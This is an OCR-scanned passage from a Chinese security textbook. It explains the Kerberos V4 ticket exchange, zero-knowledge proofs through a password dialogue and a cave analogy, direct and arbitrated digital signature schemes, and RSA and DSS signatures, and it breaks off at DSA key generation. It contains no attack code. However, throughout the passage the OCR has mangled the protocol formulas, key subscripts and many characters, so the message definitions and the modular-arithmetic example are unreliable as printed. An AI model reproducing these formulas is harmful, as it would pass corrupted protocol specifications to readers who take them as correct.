时 间 稚 及 有 效 期 限 。 当 客户 端 拿 到 了 与 TGS 通信 的 票据 后 ,客户 端 使 用 此 票据 再 向 TGS 
要 一 张 与 服务 器 连 线 所 需要 的 票据 (此 时 不 用 再 输入 密码 ) ,此 票据 中 即 包 含 客户 端 和 服务 
器 会 话 所 需要 用 的 会 话 密 钥 。 最 后 ,客户 端 利用 该 会 话 密 钥 将 它 和 服务 器 之 间 的 通信 内 容 
加 密 以 在 网 络 上 传送 。 值 得 一 提 的 是 ,在 与 TGS 通信 所 使 用 的 票据 过 期 之 前 ,客户 端 若 要 
再 和 别 的 服务 器 连 线 的 话 , 就 只 要 通过 TGS 获取 服务 器 的 票据 即 可 ,不 必 再 通过 AS。 

下 面 我 们 介绍 Kerberos V4 认证 协议 的 详细 流程 ,总 共 分 为 三 大 步骤 : 

(1) 客户 端 认 证 : 客户 端 先 向 认证 服务 器 证 明 自 己 的 身份 以 便 取得 与 TGS 通信 所 要 
使 用 的 票据 , 称 为 票据 授权 票据 (ticket-granting ticket) 。 

这 个 步骤 包含 了 图 6-10 中 的 和 @: 

© C=>AS: ID. | IDs, | TS,; 

© AS—>C: Ex.[K.w: | IDs, || TS; || Lifetimes || Ticketss, ]。 
其 中 

Ticketis = Ekes [Kgs || ID. || AD. | ID || TS; || Lifetime; J 

在 上 述 的 信息 四 中 ,ID. ID。. 及 TS, 是 用 来 让 AS 验证 客户 端的 身份 ,并 且 要 求 与 TGS 
沟通 ,此 信息 是 在 时 间 戳 TS, 时 产生 。 在 信息 @ 中 .所 有 信息 都 使 用 KK.( 客 户 端 与 认证 服务 
器 所 共享 的 密 钥 ) 加 密 传送 给 客户 端 以 避免 资料 被 别人 截取 。 开 。 心 是 由 AS 所 产生 的 会 话 
密 钥 ,用 来 让 客户 端 和 TGS 沟通 时 使 用 ,如 此 一 来 ,客户 端 与 TGS 便 不 需要 共享 一 个 密 钥 
了 。ID。 是 用 来 表示 此 票据 是 用 来 与 TGS 沟通 用 的 。Lifetimes 用 来 告诉 客户 端 Ticketw 
的 有 效 期 限 。TS; 为 另 一 个 时 间 截 ,用 来 通知 客户 端 关 于 Ticketw, 的 产生 时 间 。Ticketws 是 
给 客户 端 用 来 与 TGS 通信 用 的 票据 ,该 票据 是 用 AS 和 TGS 所 共享 的 密 钥 加 密 , 以 避免 被 
客户 端 算 改 资料 。 
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(2) 取得 与 服务 器 通信 的 票据 : 客户 端 从 TGS 取得 一 张 与 所 要 使 用 的 服务 所 需要 连 
线 的 服务 授权 票据 (service-granting ticket) 。 
这 个 步骤 包含 了 图 6-10 中 的 @ 和 @: 
Q@ C—>TGS: ID, || Tickete。 || Authenticator。 ; 
@ TGS—C: Eree[K。。 | ID, || TS, || Ticket, ]。 
其 中 
Ticketw, = Exwss [Kes | ID. | AD. || IDs, || TS; || Lifetime; ] 
Ticket, = Eks[LK.., | ID. | AD. | ID, | TS, || Lifetime, ] 
Authenticator. = Ex,ws [LID. | AD. || TS;] 
在 信息 @ 中 ,ID, 用 来 表示 客户 端 C 要 求 与 服务 器 ID, 进行 通信 ,Ticketw 为 信息 @ 中 
所 取得 的 ,用 来 证 明 C 已 通过 AS 的 认证 。Authenticator。 用 来 证 明 自 己 是 Ticketw, 的 拥有 
者 。Ticketws 中 的 ID. 可 用 来 表示 此 票据 是 给 ID. 使 用 的 ,其 中 的 AD. 为 客户 端 所 在 计算 
机 的 网 络 地 址 ,用 来 限制 只 有 同样 网 络 地 址 的 机 器 才能 使 用 此 票据 ,这 可 避免 别人 用 同样 的 
ID 并 冒 用 此 票据 企图 取得 存 取 权限 。 票 据 中 加 入 IDis, 可 用 来 验证 此 Tickete 解 密 是 否 成 
功 。 而 TS, 表示 此 Ticketw, 产 生 的 时 间 ,Lifetimes 用 来 表示 此 Ticketw 的 有 效 期 限 。 
Authenticator。 是 由 客户 端 所 产生 的 ,其 使 用 期 限 非常 短 以 减少 遭受 他 人 重 放 攻击 
(replay attack) 的 机 会 。 其 中 包括 一 个 TS; 时 间 惟 表示 此 Authenticatore 产生 的 时 间 。ID. 
和 AD. 都 是 用 来 与 Ticketws 中 的 ID. 和 AD. 做 比 对 之 用 ,以 证 明 客户 端的 身份 。 
在 信息 四 中 ,所 有 信息 都 使 用 Kis 加密 传送 给 客户 端 以 避免 资料 在 网 络 上 被 别人 截 
取 。 此 信息 包含 了 KK., 以 让 客户 端 能 够 与 服务 器 端 做 加 解密 。ID, 用 来 表示 Ticket, 是 用 
来 与 服务 器 S 沟通 之 用 。TS, 时 间 戳 用 来 表示 此 Ticket, 的 产生 时 间 ,而 Ticket, 是 由 票据 
授权 服务 器 所 签发 给 客户 端 用 来 与 服务 器 通信 用 的 票据 。 
(3) 客户 端 与 服务 器 通信 : 使 用 所 需 服务 。 
这 个 步骤 包含 了 图 6-10 中 的 @ 和 人， 
© C-~S: Ticket, | Authenticatore; 
© SsS=C: Er:[TS;+1]。 
其 中 
Ticket, = Er:s[LK.., | ID. | AD. || ID, | TS, || Lifetime, J 
Authenticator. = Ex.,s[LID. || AD. | TS;] 
信息 @ 与 信息 @ 作 用 类 似 , 在 此 不 再 次 述 ,而 信息 @ 是 客户 端 认 证 服务 器 的 过 程 ,以 证 
明 该 服务 器 有 能 力 解密 信息 @ 的 Authenticator 并 回 传 男 一 个 时 间 惟 TS; 十 1。 在 网 络 遭 
受 攻击 时 ,有 可 能 会 有 入 侵 者 企图 假冒 服务 器 以 取得 客户 端的 一 些 机 密 资料 ,因此 在 客户 端 
与 服务 器 端 连 线 时 ,客户 端 也 有 必要 确认 服务 器 端的 身份 (尤其 是 在 从 事 电子 商务 活动 时 )， 
而 不 是 单 向 地 由 服务 器 端 认 证 客户 端 而 已 。 
通信 过 程 中 所 使 用 的 各 个 参数 定义 整理 列表 如 表 6-1 所 示 。 
在 Kerberos v4 版 本 中 整个 Kerberos 系统 属于 单一 网 域 ,而 更 新 版 本 (v5) 则 提供 了 比 
第 四 版 更 完善 的 认证 机 制 ,以 达到 跨 网 域 的 认证 需求 。 
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表 6-1 Kerberos 认证 系统 参数 说 明 


参 说 明 
下 Client, 代 表 用 户 端 
S Server, 代 表 服 务 器 
TGS Ticket-Granting Server, 票 据 授权 服务 器 
TS Timestamp, 时 间 截 。 代 表 的 是 一 个 时 间 序列 的 顺序 ,如 TS: >TS, 时 表示 TS, 的 发 生 
时 间 在 TS, 之 后 
Ticket 票据 ,网 络 双方 通信 时 所 需要 的 有 效 赁 证 
Lifetime 用 来 表示 票据 的 有 效 期 限 
ID. 客户 端的 ID 
IDe。 票据 授权 服务 器 的 ID 
天。 认证 服务 器 AS 和 客户 端 共享 的 密 铀 
K. TGS 和 服务 器 共享 的 密 钥 
Ku 认证 服务 器 AS 和 票据 授权 服务 器 共享 的 密 钥 
| 由 认证 服务 器 AS 所 产生 的 一 个 会 话 密 钥 ,用 来 让 客户 端 和 票据 授权 服务 器 TGS 通信 
Kas 由 TGS 传 给 客户 端 ,让 客户 端 能 够 与 服务 器 端 加 解密 资料 的 密 钥 
ke 表示 信息 使 用 密 钥 K. 加 密 
ke 表示 信息 使 用 密 钥 Ke 加 密 
ke 表示 信息 使 用 密 钥 Ke 加 密 
Tickete 客户 端 用 来 与 TGS 通信 用 的 票据 
Ticket, 客户 端 与 服务 器 通信 用 的 票据 
AD 一 个 客户 端 所 在 位 置 的 IP 地 址 ,用 来 代表 谁 能 使 用 此 票据 
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通常 的 身份 认证 都 要 求 传输 口令 或 身份 信息 (尽管 是 加 密 传 输 ) 。 如 果 不 传输 这 些 信 
息 , 身 份 也 能 得 到 证 明 就 好 了 ,这 就 需要 零 知 识 证 明 技术 (the proof of zero knowledge) 。 

用 了 表示 示 证 者 ,用 V 表示 验证 者 ,P 试图 向 V 证 明 自 己 知道 某 信息 。 一 种 方法 是 了 
说 出 这 一 信息 使 V 相信 ,这 样 V 也 知道 了 这 一 信息 ,这 是 基于 知识 的 证 明 ; 另 一 种 方法 是 
使 用 某 种 有 效 的 数学 方法 ,使 得 V 相信 他 掌握 这 一 信息 , 却 不 泄露 任何 有 用 的 信息 ,这 种 方 
法 称 为 零 知 识 证 明 。 

下 面 是 用 一 个 故事 来 说 明 零 知识 证 明 : 


a 


a 


:“ 我 知道 主 系统 计算 机 的 口令 ”。 

:“ 不 ,你 不 知道 ”。 

:“ 我 知道 ”。 

:“ 你 不 知道 1” 

:“ 我 确实 知道 1” 

:“ 请 你 证 实 这 一 点 1” 

:“ 好 吧 ,我 告诉 你 1”( 她 悄悄 地 说 出 了 口令 )。 


V:“ 太 有 趣 了 ! 现在 我 也 知道 了 。 我 要 进入 主 计算 机 。” 
P 要 证 明 一 些 事情 给 V 看 的 通常 方法 是 P 告 诉 V。 但 这 样 一 来 V 也 知道 了 这 些 事 情 。 
现在 ,V 就 可 以 告诉 他 想 要 告诉 的 其 他 人 ,而 且 P 对 此 毫 无 办 法 。 
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P 可 使 用 单 向 函数 进行 零 知 识 证 明 。 这 个 协议 向 V 证 明 P 确实 拥有 某 个 信息 ,但 却 没 
有 给 予 V 这 个 信息 的 内 容 。 

这 个 证 明 过 程 采取 了 交互 式 协议 的 形式 。V 问 P 

-系列 问题 ,如 果 P 知道 那个 信息 ,她 就 能 正确 地 回答 

所 有 问题 ,如 果 她 不 知道 ,她 仍 有 正确 回答 的 机 会 一 
在 如 下 例子 中 有 50% 的 机 会 。 大 约 在 十 个 问题 之 后 ， 
将 使 V 确信 了 知道 那个 信息 。 然 而 ,所 有 的 问题 或 回 
答 都 没有 给 V 提供 关于 P 所 知 信息 的 任何 信息 。 

我 们 可 以 用 一 个 关于 洞穴 的 故事 来 解释 零 知识 ， 
如 图 6-11 所 示 ,洞穴 里 面 有 一 个 秘密 咒语 ,只 有 知道 
听 语 的 那些 人 能 打开 C 和 D 之 间 的 密 门 。 

P 知道 这 个 洞穴 的 秘密 。 她 想 对 V 证 明 这 一 点 ,但 她 不 想 泄露 咒语 。 下 面 是 她 如 何 使 
V 相信 的 过 程 : 

(1) V 站 在 A 点 。 

(2) P 一 直 走 进 洞穴 ,到 达 C 点 或 者 D 点 。 

(3) 在 P 消失 在 洞穴 中 之 后 ,V 走 到 B 点 。 

(4) V 向 P 喊叫 ,要 她 从 左 通道 出 来 ,或 者 从 右 通道 出 来 。 

(5) P 答 应 了 ,如 果 有 必要 她 就 用 咒语 打开 密 门 。 

(6) P 和 V 重复 步骤 (1) 至 (5) 次 。 

若 P 不 知 咒语 ,只 有 50 凶 的 机 会 猜 中 V 的 要 求 , 协 议 执行 n 次 , 则 只 有 2 "的 机 会 完全 
猜 中 , 若 "一 16, 则 若 每 次 均 通 过 V 的 检验 ,V 受骗 机 会 仅 为 1/65 536 。 

这 种 思想 转化 为 数学 问题 ,很 容易 用 大 数 分 解 问题 或 离散 对 数 问题 来 实现 。 下 面 介绍 

-种 最 简单 的 零 知 识 证 明 数 学 实现 。 
假如 P 想 说 服 V, 使 V 相信 她 确实 知道 的 因子 p 和 q, 但 不 能 告诉 V, 最 简单 的 步 


图 6-11 零 知 识 洞穴 


又 是 : 
(1) V 随机 选择 一 整数 x, 计算 zx! mod n 的 值 , 并 告诉 P。 

(2) P 求 xz? mod n 并 将 它 告诉 V。 

(3) V 验证 x* mod n。 

V 知道 求 xz* mod n 等 价 于 nn 的 因数 分 解 , 若 不 掌握 的 因数 p 和 4g, 求解 是 很 困难 的 。 
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消息 认证 用 以 保护 双方 之 间 的 数据 交换 不 被 第 三 方 侵犯 ,但 它 并 不 保证 双方 自身 的 相 

互 欺 骗 。 假 定 A 发 送 一 条 包含 认证 码 的 消息 给 B, 他 们 之 间 仍 然 可 能 存在 争议 ,例如 A 可 

以 和 否认 发 过 该 消息 ,B 无 法 证 明 A 确实 发 了 该 消息 。 另 外 也 也 可 以 伪造 一 个 不 同 的 消息 ， 

但 声称 是 从 A 收 到 的 。 也 就 是 说 ,虽然 保证 了 信息 的 完整 性 ,但 无 法 保证 信息 的 抗 否认 性 。 

在 现实 生活 中 ,这 种 情况 同样 存在 ,所 以 在 人 们 的 工作 和 生活 中 ,许多 事物 的 处 理 需要 

事 者 签名 。 例 如 商业 合同 ,政府 部 门 的 文件 ,财务 的 凭证 等 都 需要 当事人 的 签名 。 签 名 起 
到 确认 、 核 准 . 生 效 和 负责 等 多 种 作用 。 


卜 
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实际 上 ,签名 是 证 明 当 事 者 身份 和 数据 真实 性 的 一 种 信息 ,具有 保证 信息 的 真实 性 和 完 
整 性 的 功能 。 在 传统 的 以 书面 文件 为 基础 的 事务 处 理 中 ,采用 书面 签名 的 方式 ,如 手印 、 签 
字 、 印 章 等 。 书 面 签名 得 到 司法 部 门 的 支持 和 承认 ,具有 一 定 的 法 律 效力 。 在 以 计算 机 文件 
为 基础 的 现代 事务 处 理 中 ,应 采用 电子 形式 的 签名 , 即 数字 签名 (digital signature) , 它 是 一 
种 防止 源 点 或 终点 抵赖 的 鉴别 技术 ,用 于 防范 通信 双方 的 欺骗 。 

数字 签名 利用 公 钥 密码 体制 进行 ,其 安全 性 取决 于 密码 体制 的 安全 程度 。 

在 中 国 , 数 字 签 名 是 具 法 律 效 力 的 ,正在 被 普遍 使 用 。2000 年 ,中 华人 民 共 和 国 的 新 
《合同 法 ?首次 确认 了 电子 合同 ,电子 签名 的 法 律 效 力 。2005 年 4 月 1 日 起 ,中 国 首 部 (电子 
签名 法 》 正 式 实施 。 


621 数字 签名 原理 


1. 数字 签名 须 满足 的 要 求 


在 传统 文件 中 ,手写 签名 长 期 以 来 被 用 做 用 户 身份 的 证 明 ,或 表明 签名 者 同意 文件 的 内 
。 实 际 上 ,签名 体现 了 以 下 几 个 方面 的 保证 : 

(1) 签名 是 可 信 的 。 签 名 使 文件 的 接收 者 相信 签名 者 是 慎重 地 在 文件 上 签名 的 。 

(2) 签名 是 不 可 伪造 的 。 签 名 证 明 是 签字 者 而 不 是 其 他 的 人 在 文件 上 签字 。 

(3) 签名 不 可 重用 。 签 名 是 文件 的 一 部 分 ,不 可 能 将 签名 移动 到 不 同 的 文件 上 。 

(4) 签名 后 的 文件 是 不 可 变 的 。 在 文件 签名 以 后 ,文件 就 不 能 改变 。 

(5) 签名 是 不 可 抵赖 的 。 签 名 和 文件 是 不 可 分 离 的 ,签名 者 事后 不 能 声称 他 没有 签 过 
这 个 文件 。 

手印 ,签名 ,印章 等 传统 的 书面 签名 基本 上 满足 以 上 条 件 ,所 以 得 到 司法 部 门 的 支持 。 
因为 一 个 人 不 能 彻底 伪装 自己 的 笔迹 ,同时 也 不 能 逼真 地 模仿 其 他 人 的 笔迹 ,而 且 公安 部 门 
有 专业 的 机 构 进 行 笔迹 鉴别 。 公 竟 的 刻 制 和 使 用 都 受到 法 律 的 保护 和 限制 , 刻 制 完全 相同 
的 两 枚 印章 是 做 不 到 的 ,因为 雕刻 属于 金石 艺术 ,每 个 雕刻 师 都 有 自己 的 艺术 风格 ,和 笔迹 
一 样 , 要 彻底 伪装 自己 的 风格 和 逼真 模仿 别人 的 风格 是 不 可 能 的 。 人 的 指纹 具有 非常 稳定 
的 特性 ,终身 不 变 , 据 专家 计算 ,大 约 50 亿 人 才 会 有 一 例 相同 的 。 

而 在 计算 机 上 进行 数字 签名 并 使 这 些 保证 能 够 继续 有 效 则 还 存在 一 些 问 题 。 有 人 可 能 
会 考虑 到 将 自己 手写 的 签名 扫描 到 计算 机 中 ,在 需要 签名 的 地 方 将 其 粘贴 上 去 。 这 种 方法 
实际 是 存在 问题 的 。 

首先 ,计算 机 文件 易于 复制 ,即使 某 人 的 签名 难以 伪造 ,但 是 将 有 效 的 签名 从 一 个 文件 
剪辑 和 粘贴 到 另 一 个 文件 是 很 容易 的 。 这 就 使 这 种 签名 失去 了 意义 。 

其 次 ,文件 在 签名 后 也 易于 修改 ,并 且 不 会 留 下 任何 修改 的 痕迹 。 

所 以 ,简单 扫描 手写 签名 是 不 能 满足 要 求 的 。 目 前 ,人 们 对 数字 签名 的 要 求 是 : 要 保证 
能 够 验证 作者 及 其 签名 的 日 期 时 间 ; 必须 能 够 认证 签名 时 刻 的 内 容 ; 签名 必须 能 够 由 第 三 
方 验证 ,以 解决 争议 。 

根据 这 些 特 征 ,为 了 方便 使 用 ,更 进一步 的 要 求 有 : 

(1) 依赖 性 : 签名 必须 是 依赖 于 被 签名 信息 来 产生 。 
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(2) 唯一 性 : 签名 必须 使 用 某 些 对 发 送 者 来 说 是 唯一 的 信息 ,以 防止 双方 的 伪造 与 否认 。 

(3) 可 验 性 : 必须 相对 容易 识别 和 验证 该 数字 签名 。 

(4) 抗 伪造 : 伪造 该 数字 签名 在 计算 上 是 不 可 行 的 ,根据 一 个 已 有 的 数字 签名 来 构造 
消息 是 不 可 行 的 ; 对 一 个 给 定 消息 伪造 数字 签名 是 不 可 行 的 。 

(5) 可 用 性 : 在 存储 器 中 保存 一 个 数字 签名 副本 是 现实 可 行 的 。 

人 们 利用 公 钥 密码 体制 来 产生 数字 签名 。 用 户 用 自己 的 私 钥 对 原始 数据 的 散 列 值 进 行 
加 密 , 所 得 的 数据 即 为 数字 签名 。 信 息 接收 者 使 用 信息 发 送 者 的 公 钥 对 附 在 原始 信息 后 的 
数字 签名 进行 解密 后 获得 散 列 值 , 并 通过 与 自己 收 到 的 原始 数据 产生 的 散 列 值 对 照 , 便 可 确 
认 原 始 信息 是 否 被 算 改 。 这 样 就 保证 了 消息 来 源 的 真实 性 和 数据 传输 的 完整 性 。 

实际 上 在 前 一 章 讲述 散 列 函数 时 ,读者 已 经 了 解 了 这 种 方法 , 它 在 本 章 被 称 做 数字 签名 。 

有 几 种 公 钥 算法 都 能 用 做 数字 签名 ,这些 公 钥 算 法 的 特点 是 不 仅 用 公 钥 加 密 的 消息 可 
以 用 私 钥 解 密 ,而 且 反 过 来 用 私 钥 加 密 的 消息 也 可 以 用 公 钥 解密 。 


2. 签名 方法 


从 协议 上 区 分 ,数字 签名 可 以 分 为 直接 数字 签名 方法 和 仲裁 数字 签名 方法 。 

1) 直接 数字 签名 

先 来 看 直接 数字 签名 方法 ,其 基本 协议 非常 简单 : 

(1) A 用 她 的 私 钥 对 文件 加 密 .从 而 对 文件 签名 。 

(2) A 将 签名 后 的 文件 传 给 B。 

(3) B 用 A 的 公 钥 解密 文件 ,如 果 能 够 顺利 地 解 出 明文 , 则 表示 签名 验证 成 功 。 

一 方面 保证 了 文件 在 签名 后 不 会 被 修改 , 另 一 方面 ,A 不 可 否认 自己 对 这 份 文件 的 义 
务 和 责任 。 

在 实际 过 程 中 ,这 种 做 法 的 效率 太 低 了 。 假 设 A 传送 的 文件 非常 庞大 ,那么 对 整 份 文 
件 进 行 加 密 就 太 浪 费时 间 和 资源 了 。 并 且 有 时 候 文件 内 容 并 不 需要 保密 ,例如 政府 的 公告 
等 。 所 以 ,数字 签名 协议 常常 与 散 列 函数 一 起 使 用 。A 并 不 对 整个 文件 签名 ,而 是 只 对 文 
件 的 散 列 值 签名 。 数字 签名 协议 原理 如 图 6-12 所 示 。 


A 的 1 
私 钥 | = | 加 密 


图 6-12 数字 签名 协议 原理 
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在 下 面 的 协议 中 , 散 列 函数 和 数字 签名 算法 是 事先 协商 好 的 : 

(1) A 产生 文件 的 散 列 值 。 

(2) A 用 她 的 私 钥 对 散 列 值 加 密 , 以 此 表示 对 文件 的 签名 。 

(3) A 将 文件 和 签名 送 给 B。 

(4) B 用 A 发 送 的 文件 产生 文件 的 散 列 值 ,同时 用 A 的 公 钥 对 签名 的 散 列 值 解密 。 如 
果 签 名 的 散 列 值 与 自己 产生 的 散 列 值 匹配 , 则 签名 是 有 效 的 。 

采用 这 种 方式 , 既 保 证 了 信息 的 完整 性 ,又 保证 了 信息 的 抗 否 认 性 ,如 果 还 需要 保证 信 
息 的 保密 性 , 则 可 以 加 入 对 称 或 者 非 对 称 的 加 密 方式 。 

由 于 两 个 不 同 的 文件 具有 相同 的 160 位 散 列 值 的 概率 为 1/2”, 所 以 在 这 个 协议 中 使 
用 散 列 函数 的 签名 与 使 用 文件 的 签名 是 一 样 安 全 的 。 

以 上 的 协议 属于 直接 数字 签名 ,这 种 签名 方法 只 牵涉 到 通信 方 。 它 假定 接收 方 知道 发 
送 方 的 公 钥 。 签 名 通过 使 用 发 送 方 的 私 钥 加 密 来 产生 。 但 这 种 体制 有 个 共同 的 弱点 : 方案 
的 有 效 性 依赖 于 发 送 方 私 钥 的 安全 性 。 

如 果 发 送 方 随后 想 否 认 发 送 过 某 个 签名 消息 ,他 可 以 声称 用 来 签名 的 私 钥 丢 失 或 者 被 
盗用 ,并 有 人 伪造 了 他 的 签名 。 通 常 需要 采用 与 私 钥 安全 性 相关 的 行政 管理 控制 手段 来 制 
止 这 种 情况 ,但 威胁 依然 存在 。 

改进 的 方式 : 例如 可 以 要 求 被 签名 的 信息 包含 一 个 时 间 戳 (日 期 与 时 间 )。 但 同样 存在 
问题 : A 的 私 钥 确 实在 时 间 工 被 窃取 ,敌手 可 以 伪造 A 的 签名 及 早 于 或 等 于 时 间 T 的 时 
间 戳 。 

为 了 解决 直接 数字 签名 中 存在 的 问题 ,引入 了 仲裁 者 。 

2) 仲裁 数字 签名 

从 发 送 方 A 到 接收 方 B 的 签名 消息 首先 送 到 仲裁 者 S,S 对 消息 及 其 签名 进行 一 系列 
测试 ,以 检查 其 来 源 和 内 容 , 然 后 将 消息 加 上 日 期 并 与 已 被 仲裁 者 验证 通过 的 指示 一 起 发 
给 B。 

仲裁 者 在 这 一 类 签名 模式 中 扮演 敏感 和 关键 的 角色 。 所 有 的 参与 者 必须 极 大 地 相信 这 
一 仲裁 机 制 工 作 正 常 。 

下 面 我 们 讨论 三 种 仲裁 数字 签名 的 实现 方法 ,约定 X 是 发 送 方 ,Y 是 接收 方 ,A 是 促 
裁 者 。 

方法 一 : 

(1) X=>A: M| ExwLIDx 1 ECM)]; 

(2) A>Y: Eksv[LIDx | MI Er LIDx | 瑟 CM)]1 TJ. 

其 中 ,E 是 单 钥 加 密 算法 ; Kx 和 Kay 是 A 分别 与 X 和 YY 的 共享 密 钥 ; M 是 消息 ; 工 是 时 
间 戳 ; IDx 是 X 的 身份 ; HCMD) 是 M 的 Hash 值 。 

在 (1) 中 ,X 以 Er [LIDx | HCMD)] 作 为 自己 对 M 的 签名 ,将 M 及 签名 发 往 A。 

在 (2) 中 人 A 将 从 X 收 到 的 内 容 和 IDx、T 一 起 加 密 后 发 往 Y, 其 中 的 荆 用 于 向 Y 表示 所 
发 的 消息 不 是 旧 消 息 的 重 放 。Y 对 收 到 的 内 容 解 密 后 ,将 解密 结果 存储 起 来 以 备 出 现 争议 
时 使 用 。 

如 果 出 现 争议 ,Y 可 声称 自己 收 到 的 M 的 确 来 自 X, 并 将 Er,y [IDx | M1 Ex [LIDx | 
有 (MD)]] 发 给 A, 由 A 仲裁 ,A 用 Kay 解 密 后 ,再 用 Kxs 对 Er [IDx | HCM)] 解 密 ,并 对 
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互 CM) 加 以 验证 ,从 而 验证 了 X 的 签名 。 

显然 ,此 方法 不 提供 对 消息 M 的 保密 。 不 过 稍 做 修改 即 可 提供 保密 功能 ,见方 法 二 。 

为 法 三 

(1) X>A: IDx | Ex [MJ | Er LIDx |‖ HCEr, (CM) )]; 

(2) A—>Y: Ery LIDx | Er.y LM] | Er LIDx | H(Exyy CM))] 1 Tj]。 

其 中 ,Kxy 是 X 和 YY 的 共享 密 钥 。 这 里 ,Er [IDx eH(Ek、, (M))] 就 是 X 对 M 的 数字 
签名 。 

显然 ,这 个 方案 提供 了 对 M 的 保密 性 。 但 是 ,和 前 一 方案 相同 ,仲裁 者 可 和 发 送 方 共 谋 
否认 发 送 方 曾 发 过 的 消息 ,也 可 和 接收 方 共 谋 产 生发 送 方 的 签名 。 为 了 解决 这 个 问题 ,可 以 
采用 方法 三 。 

方法 三 : 

(1) X>A: IDx | Esxy [IDx | Epkry LEsry CMJ]]; 

(2) A 一 了 Y: Ex, [IDx | Epky LEsx, LM]] 作 了 3 
其 中 ,SKx 是 X 的 私 钥 ,PKY 是 YY 的 公 钥 。 

在 (1) 中 ,X 用 自己 的 私 钥 SKx 和 YY 的 公 钥 PKy 对 消息 加 密 后 作为 对 M 的 签名 ,以 这 
种 方式 使 得 任何 第 三 方 (包括 A) 都 不 能 得 到 M 的 明文 消息 。 

A 收 到 X 发 来 的 内 容 后 ,用 X 的 公 钥 可 对 Esx、[IDx ‖ Epx, [Esx、 LM]]] 解 密 , 并 将 解密 
得 到 的 IDx 与 收 到 的 IDx 加 以 比较 ,从 而 可 确信 这 一 消息 是 来 自 于 X 的 ( 因 只 有 X 有 SKx)。 

在 (2) 中 ,A 将 X 的 身份 IDx 和 X 对 M 的 签名 加 上 一 个 时 间 惟 后 ,再 用 自己 的 私 钥 加 
密 后 发 往 Y。 

与 前 两 种 方法 相 比 ,第 三 种 方法 有 许多 优点 。 首 先 , 在 协议 执行 以 前 ,各 方 都 不 必 有 共 
享 的 信息 ,从 而 可 防止 共 谋 ; 其 次 ,只 要 仲裁 者 的 私 钥 不 被 泄露 ,任何 人 包括 发 送 方 都 不 能 
发 送 重 放 的 消息 ; 最 后 ,对 任何 第 三 方 (包括 A) 来 说 ,X 发 往 Y 的 消息 都 是 保密 的 。 当 然 ， 
功能 越 齐全 ,付出 的 通信 成 本 也 越 高 。 


622 数字 签名 算法 


数字 签名 的 算法 很 多 ,应 用 最 为 广泛 的 三 种 是 RSA 签名 、DSS 签名 和 基于 ECC 密码 
体制 的 ECDSA 数字 签名 。 


1. RSA 数字 签名 


假定 RSA 的 公 钥 密码 系统 已 经 建立 , 若 用 户 A 要 对 某 报 文 ( 或 其 他 文件 或 数据 分 组 ) 
实现 数字 签名 ,并 发 送 给 B(B 可 能 是 用 户 , 也 可 能 是 仲裁 中 心 ) , 则 数字 签名 算法 如 下 : 

1) 签名 的 实现 

用 户 A 使 用 自己 的 私 钥 SKA 对 报 文 进行 解密 运算 形成 了 签名 ,然后 将 报 文 和 签名 一 
起 发 送出 去 。 也 就 是 签名 Sa 一 D(M,SKa)==(M’)mod n。 

不 过 一 般 使 用 的 方式 是 对 明文 的 散 列 值 进行 加 密 : SA 一 DCHECM) ,SKa)。 

实际 上 是 用 私 钥 对 明文 或 者 散 列 值 进行 解密 运算 的 过 程 。 注 意 ,这 里 说 的 “解密 运算 ”， 
并 不 是 指 将 密 文 转换 为 明文 的 过 程 ,而 应 该 理解 为 一 种 广义 的 转换 运算 。 
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2) 签名 的 验证 

接收 方 B 将 接收 到 的 签名 用 发 送 方 A 的 公 钥 进行 加 密 运 算得 到 正 (Ss, PKA) 一 
(SA)*mod n 一 M。 同 样 ,这 里 的 “加 密 运 算 ” 也 应 该 理解 为 一 种 广义 的 转换 运算 。 如 果 是 对 
散 列 值 进 行 加 密 , 则 E(Ss,PKs) 二 (Sa)*mod n 一 H(M)。 并 且 用 相同 的 散 列 函 数 处 理 接 收 
到 的 报 文 得 到 新 的 散 列 码 , 若 这 个 散 列 码 和 解密 的 签名 相 匹配 , 则 认为 签名 是 有 效 的 ,否则 
认为 报 文 被 自 改 或 受到 攻击 者 欺骗 。 这 是 因为 只 有 发 送 方 知道 自己 的 私 钥 , 因 此 只 有 发 送 
方才 能 产生 有 效 的 签名 。RSA 的 签名 方案 如 图 6-13 所 示 。 


比较 


Esr\[HOMD] 


6-13 RSA 签名 方案 


2. DSS 数字 签名 


美国 国家 标准 技术 研究 所 于 1994 年 颁布 了 联邦 信息 处 理 标准 FIPS 186 , 称 为 数字 签 
名 标准 (DSS) 。DSS 给 出 了 一 种 新 的 数字 签名 方法 , 即 数字 签名 算法 DSA, 签 名 的 对 象 是 
安全 散 列 算法 SHA 对 消息 M 计算 出 来 的 散 列 值 。DSS 最 初 提出 于 1991 年 ,1993 年 根据 
公众 对 于 其 安全 性 的 反馈 意见 进行 了 修改 ,1996 年 又 稍 做 修改 。2000 年 发 布 了 该 标准 的 扩 
充 版 , 即 FIPS 186-2。 

和 RSA 不 同 的 是 ,DSS 使 用 的 是 只 提供 数字 签名 的 算法 。 不 用 于 加 密 或 者 密 钥 分 配 。 

在 RSA 方法 中 , 散 列 函数 的 输入 是 要 签名 的 消息 ,输出 是 定 长 的 散 列 值 ,用 发 送 方 的 私 
钥 对 该 散 列 值 加 密 形 成 签名 ,然后 发 送 消息 和 签名 。 接 收 方 用 发 送 方 的 公 钥 对 签名 解密 以 
验证 签名 。 

DSS 方法 也 使 用 散 列 函 数 , 它 产 生 的 散 列 值 和 为 此 次 签名 而 产生 的 随机 数 & 作为 签名 
函数 的 输入 ,签名 函数 依赖 于 发 送 方 的 私 钥 Ke 和 一 组 参数 ,这 些 参数 为 一 些 通信 伙伴 所 共 
有 ,我 们 可 以 认为 这 组 参数 构成 全 局 公 钥 Kus 。 对 于 不 同 的 用 户 ,这 些 附 加 参数 可 以 不 同 。 
在 实际 应 用 中 ,更 可 能 的 情况 是 将 全 局 公 钥 与 每 个 用 户 的 公 钥 分 开 使 用 。 

签名 由 两 部 分 组 成 ,标记 为 s 和 v。 

接收 方 对 接收 到 的 消息 产生 散 列 值 , 这 个 散 列 值 和 签名 一 起 作为 验证 函数 的 输入 ,验证 
函数 依赖 于 全 局 公 钥 和 发 送 方 公 钥 , 若 验证 函数 的 输出 等 于 签名 中 的 成 分 , 则 签名 是 有 效 
的 。 签 名 函数 保证 只 有 拥有 私 钥 的 发 送 方才 能 产生 有 效 签 名 。 

下 面 我 们 讨论 数字 签名 算法 DSA。DSA 建立 在 求 离散 对 数 的 困难 性 之 上 ,DSA 算法 
的 具体 签名 过 程 如 下 : 

1) 密 钥 的 产生 

(1) 产生 全 局 公 钥 (pp,q,g)。 

